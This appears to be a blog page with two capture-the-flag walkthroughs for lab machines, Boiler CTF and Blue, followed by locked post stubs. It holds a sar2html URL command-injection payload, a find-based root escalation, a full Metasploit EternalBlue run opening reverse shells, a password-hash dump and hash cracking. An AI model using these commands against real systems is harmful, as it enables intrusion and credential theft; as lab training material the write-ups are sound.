thm-boilerctf-nl

[Hacking walkthrough] Boiler CTF

Another day, another adventure on the CTF challenge. This time I’m going to do a write-up on Boiler CTF. This is an intermediate CTF challenge. This room is written by MrSeth6797 who also a creator for the simple CTF challenge. Without further ado, let’s jump into the rabbit-hole.

Task 1: Enumerate, enumerate and enumerate.

As the title said, Enumerate is the key to this challenge. Not only that, but it also serves as an important aspect in all sort of CTF challenge and pentesting. This task requires the challenger to collect any available information on the machine.

First and foremost, fire up your nmap with the following command.

$ nmap -Pn -A -v <MACHINE IP>

By using nmap scanner, you will discover 3 open ports namely FTP (Port 21), HTTP (Port 80) and Webmin (Port 10000). Let’s move on to task 1-1.

Task 1-1: Ghost file

Let’s investigate the FTP for any anonymous file (anon file).

Look like the FTP server is empty or is it? I continue to open the FTP server using Filezilla with hidden option enable.

Input the IP address and port number (Username and password are not required, it is anon after all).

We get a hidden file named .info.txt. Open the file up and you will get a ciphered text.

Look like a Ceaser cipher + 13 or ROT 13. Decipher the text will give you the following result

This is the opening hint given by the author. “Enumeration is the key”.

Answer: txt

Task 1-2: What is on the highest port?

Just like the same old Mrseth, like to put something in the higher port number. This time we going to make a full port scan using the following command.

$ nmap -p- <MACHINE IP>

That’s it, an open port can be found on 55007. Let’s continue the specific scan using the following command to make sure what is inside the port.

Bingo! Port 55007 is reserved for ssh. Let me repeat the moral of the story again. Assign a common service to a higher number, so that those noobs will never find it out.

Answer: ssh

Task 1-3: What is running on port 10000?

This is a straight forward answer.

Answer: webmin

Task 1-4: can you exploit port 10000

After searching from google, none of the exploits can be applied to the port. This is because the Webmin is in the latest version (as for 23/8/2019). Moral of the story, always keeps your application up-to-date unless there is 0-day exploitation.

Answer: nay

Task 1-5: What is the CMS on port 80

Port 80? Time to fire up the gobuster to look for a suspicious directory.

gobuster dir -u <MACHINE IP> -w /usr/share/dirb/wordlists/common.txt

We get Joomla CMS.

Answer: Joomla

Task 1-6: More enumeration

From this onward, you need to enumerate the Joomla server real hard. Well, let’s honorable the below message sent by the author.

This is the first time I trolled so hard by a CTF challenge. Thanks to Mrseth who provide me some hints. The hints are, enumerate the Joomla directory with gobuster. Use the following command and dictionary.

$ gobuster dir -u 10.10.79.97/joomla/_files -w /usr/share/dirb/wordlists/common.txt

After that, investigate the directory one by one and eventually, you will find something different. Which directory is different than the others? The ‘_test’.

sar2html? what the freak is that and how we going to exploit it. After doing some googling, I got the answer below.

This few sentences are very useful. This is a URL injection (kind of). Go to the sar2html page and enter the following URL and click on select host option.

http://<MACHINE IP>/joomla/_test/index.php?plot=;ls

What did you see? The URL is now your shell for the server but it ain’t a root. The file we interested here is log.txt. To read the log file, you need the following URL

http://<MACHINE IP>/joomla/_test/index.php?plot=;cat log.txt

You get a login credential where the username and password are ‘basterd’ and ‘superduperp@$$’. How we apply this credential to? Still, remember the ssh port like the log said. Give it a try!

Answer: log.txt

Task 2: Exploit

After the enumeration, time to exploit the machine. From this point, I assume you have successfully logged into the basterd’s ssh shell.

Task 2-1: Where is Stoner’s password?

We know that there are other users called stoner and we need the ssh password. Notice that there is only one script file inside basterd’s folder. Instead of running the script, read the script file.

You will notice a line of phrase. That is the password for Stoner, superduperp@$$no1knows. Login into stoner with the password using ssh.

Answer: backup

Task 2-2: Capture Stoner’s flag

Capturing this flag is a bit tricky where stoner folder is totally empty. Or is it?

Well, I don’t think so. This flag actually a hidden with named .secret. Always check with the hidden file.

Answer: You made it till here, well done.

Task 2-3: Privilege escalate

Time for the final boss of the challenge. How are you gonna root the machine? Sudo -l? Neh, Mrseth will never repeat the same mistake.

This time, I’m going to do some searching on the GTFObins with shell attribute, the find command looks promising. create a sample file inside stoner directory and run the search with the following command.

$ find sample -exec whoami \;

Congratulation, the machine is now rooted !!

Answer: find

Task 2-4: The final flag

Input the following command and capture the final flag

$ find sample -exec cat /root/root.txt \;

Answer: It wasn’t that hard, was it?

Conclusion

That’s all for the boiler CTF write-up. Before I end this post, I would like to say thanks Mrseth who guide me on completing the room. Hope you learn something new and see you again!

Share the knowledge

thm-blue-nl

TryHackMe – Blue


Titulo Blue
Room Blue
Info Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
RoomCode blue
Puntos 3850
Dificultad Relativamente Facil
Maker DarkStar7471

MASSCAN & NMAP

Escaneo de puertos udp/tcp y sus servicios.

root@kali:~/trymehack/blue# masscan -p1-65535,U:1-65535 10.10.24.91 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-09-04 00:56:01 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49153/tcp on 10.10.24.91                                  
Discovered open port 49154/tcp on 10.10.24.91                                  
Discovered open port 49152/tcp on 10.10.24.91                                  
Discovered open port 137/udp on 10.10.24.91                                    
Discovered open port 3389/tcp on 10.10.24.91 

# Nmap 7.70 scan initiated Tue Sep  3 21:03:21 2019 as: nmap -sC -sV -p1-1000 -o nmap.scan_mil 10.10.24.91
Nmap scan report for 10.10.24.91
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ae:0a:27:4e:02 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-09-03T20:04:00-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-09-03 21:04:00
|_  start_date: 2019-09-03 20:54:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep  3 21:04:06 2019 -- 1 IP address (1 host up) scanned in 45.67 seconds
SMBCLIENT & SMBMAP

Escaneo de sharenames.

root@kali:~/trymehack/blue# smbclient -L \\10.10.24.91
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.10.24.91]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.24.91 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
root@kali:~/trymehack/blue# smbmap -H 10.10.24.91
[+] Finding open SMB ports....
root@kali:~/trymehack/blue# 
NMAP – SMB SCRIPTS

Utilizamos los scripts de nmap para verificar si alguno es vulnerable con la maquina, y, encontramos que es vulnerable a ms17-010 o ETERNALBLUE.

root@kali:~/trymehack/blue# nmap --script smb-vuln-* 10.10.24.91
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-03 21:11 EDT
Nmap scan report for 10.10.24.91
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 42.25 seconds
METASPLOIT – ETERNALBLUE

Utilizamos metasploit y el exploit exploit/windows/smb/ms17_010_eternalblue contra la maquina, lo configuramos y corremos el exploit.

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.24.91
rhosts => 10.10.24.91
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.8.1.72:4444 
[+] 10.10.24.91:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.24.91:445 - Connecting to target for exploitation.
[+] 10.10.24.91:445 - Connection established for exploitation.
[+] 10.10.24.91:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.24.91:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.24.91:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.24.91:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.24.91:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.24.91:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.24.91:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.24.91:445 - Sending all but last fragment of exploit packet
[*] 10.10.24.91:445 - Starting non-paged pool grooming
[+] 10.10.24.91:445 - Sending SMBv2 buffers
[+] 10.10.24.91:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.24.91:445 - Sending final SMBv2 buffers.
[*] 10.10.24.91:445 - Sending last fragment of exploit packet!
[*] 10.10.24.91:445 - Receiving response from exploit packet
[+] 10.10.24.91:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.24.91:445 - Sending egg to corrupted connection.
[*] 10.10.24.91:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.8.1.72:4444 -> 10.10.24.91:49196) at 2019-09-03 21:15:49 -0400
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
UPGRADE SHELL – METERPRETER

Utilizamos el eexploit de post explotacion multi/manage/shell_to_meterpreter para actualizar nuestra shell a meterpreter.

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x64/windows  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)

msf5 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options 

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.1.72:4433 
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (179779 bytes) to 10.10.24.91
[*] Meterpreter session 2 opened (10.8.1.72:4433 -> 10.10.24.91:49203) at 2019-09-03 21:21:37 -0400
[*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      10.8.1.72:4433 -> 10.10.24.91:49203 (10.10.24.91)

msf5 post(multi/manage/shell_to_meterpreter) > 
METASPLOIT – HASHDUMP
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Jon:"Nah boi, I ain't sharing nutting with you"

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


meterpreter >
JOHN – CRACK PASSWORDS

Crackeamos las contraseñas con john.

root@kali:~/trymehack/blue# john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2019-09-03 21:34) 2.061g/s 10515Kp/s 10515Kc/s 10520KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
root@kali:~/trymehack/blue#
FLAGS

Encontrando las flags.

meterpreter > ls
Listing: C:\
============

Mode                 Size                Type  Last modified                     Name
----                 ----                ----  -------------                     ----
40777/rwxrwxrwx      0                   dir   2009-07-13 23:18:56 -0400         $Recycle.Bin
40777/rwxrwxrwx      0                   dir   2009-07-14 01:08:56 -0400         Documents and Settings
40777/rwxrwxrwx      0                   dir   2009-07-13 23:20:08 -0400         PerfLogs
40555/r-xr-xr-x      4096                dir   2009-07-13 23:20:08 -0400         Program Files
40555/r-xr-xr-x      4096                dir   2009-07-13 23:20:08 -0400         Program Files (x86)
40777/rwxrwxrwx      4096                dir   2009-07-13 23:20:08 -0400         ProgramData
40777/rwxrwxrwx      0                   dir   2018-12-12 22:13:22 -0500         Recovery
40777/rwxrwxrwx      4096                dir   2018-12-12 18:01:17 -0500         System Volume Information
40555/r-xr-xr-x      4096                dir   2009-07-13 23:20:08 -0400         Users
40777/rwxrwxrwx      16384               dir   2009-07-13 23:20:08 -0400         Windows
100666/rw-rw-rw-     24                  fil   2018-12-12 22:47:39 -0500         flag1.txt
567211570/r-xrwx---  438533065912909807  fif   13905563959-04-24 15:54:40 -0400  hiberfil.sys
567211570/r-xrwx---  438533065912909807  fif   13905563959-04-24 15:54:40 -0400  pagefile.sys

meterpreter > cat flag1.txt 
flag{******************}
meterpreter > pwd
C:\
meterpreter >
Utilizamos dir para encontrar los archivos que lleven el nombre de “flag”.

Comando:

dir flag* /s /p
C:\>dir flag* /s /p
dir flag* /s /p
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\

03/17/2019  02:27 PM                24 flag1.txt
               1 File(s)             24 bytes

 Directory of C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent

03/17/2019  02:26 PM               482 flag1.lnk
03/17/2019  02:30 PM               848 flag2.lnk
03/17/2019  02:32 PM             2,344 flag3.lnk
               3 File(s)          3,674 bytes

 Directory of C:\Users\Jon\Documents

03/17/2019  02:26 PM                37 flag3.txt
               1 File(s)             37 bytes

     Total Files Listed:
               5 File(s)          3,735 bytes
               0 Dir(s)  22,796,713,984 bytes free

C:\>

C:\>type C:\Users\Jon\Documents\flag3.txt
type C:\Users\Jon\Documents\flag3.txt
flag{*******************************}
C:\>
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>type flag2.lnk
type flag2.lnk
L�F�  h+汖��h+汖��=]�����'P�O� �:i�+00�/C:\R1�M�Windows��:���M�*pWindowsV1qN��System32��:��qN��*	System32P1�Mconfig��:���M*�	configX2'�M flag2.txtヘM�M*�flag2.txtS-Rf
�C:\Windows\System32\config\flag2.txt6..\..\..\..\..\..\..\Windows\System32\config\flag2.txt�C:\Windows\System32\config(	�1SPS�XF�L8C���&�m�`�Xjon-pc��̴�H�C�Kz�k��:������d)d�4
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>dir /ah C:\Windows\System32\config
dir /ah C:\Windows\System32\config
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Windows\System32\config

File Not Found

C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>
Nuestra flag2 se encuentra en *C:\Windows\System32\config*.
C:\Windows\system32>type C:\Windows\System32\config\flag2.txt
type C:\Windows\System32\config\flag2.txt
flag{****************************}
C:\Windows\system32>

 

Beveiligd: htb-mobile-challenges

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-stego-challenges

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-reddish-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-multimaster-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-crypto-challenges

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-rope-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-misc-challenges

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op